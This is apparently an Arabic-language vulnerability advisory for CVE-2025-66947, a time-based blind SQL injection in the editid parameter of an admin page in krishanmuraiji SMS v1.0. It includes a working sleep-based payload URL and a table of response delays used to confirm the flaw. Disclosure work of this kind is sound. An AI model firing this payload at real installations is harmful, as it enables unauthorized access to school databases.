
حقن SQL في krishanmuraiji SMS v1.0 (CVE-2025-66947)
⏱️ مقارنة بصرية: استجابة عادية مقابل استجابة متأخرة بحوالي 6 ثوانٍ
الخلاصة: يسمح معامل GET في وحدة إدارية بحقن SQL قائم على الوقت عبر تأخيرات الاستجابة.
توجد ثغرة حقن SQL أعمى قائم على الوقت في krishanmuraiji SMS v1.0 بسبب التحقق غير السليم من معامل GET في وحدة إدارية.
/studentms/admin/edit-class-detail.phpeditid (GET)/studentms/admin/edit-class-detail.php?editid=12
/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)
| الحمولة | التأخير |
|---|---|
sleep(3) | ~3s |
sleep(6) | ~6s |
sleep(15) | ~15s |
تأخير ثابت = تأكيد حقن SQL
يظهر نمط الثغرة هذا بشكل شائع في:
حتى عندما تكون المصادقة مطلوبة والأخطاء مخفية،
يظل حقن SQL القائم على الوقت قابلاً للاستغلال وخطيرًا.
الخطورة: عالية
CVE-2025-66947
Ranjan Kumarيتم تقديم هذا الإثبات للأغراض التعليمية والدفاعية فقط.
CVE-2025-66947, حقن SQL, حقن SQL أعمى قائم على الوقت, PHP, لوحة إدارة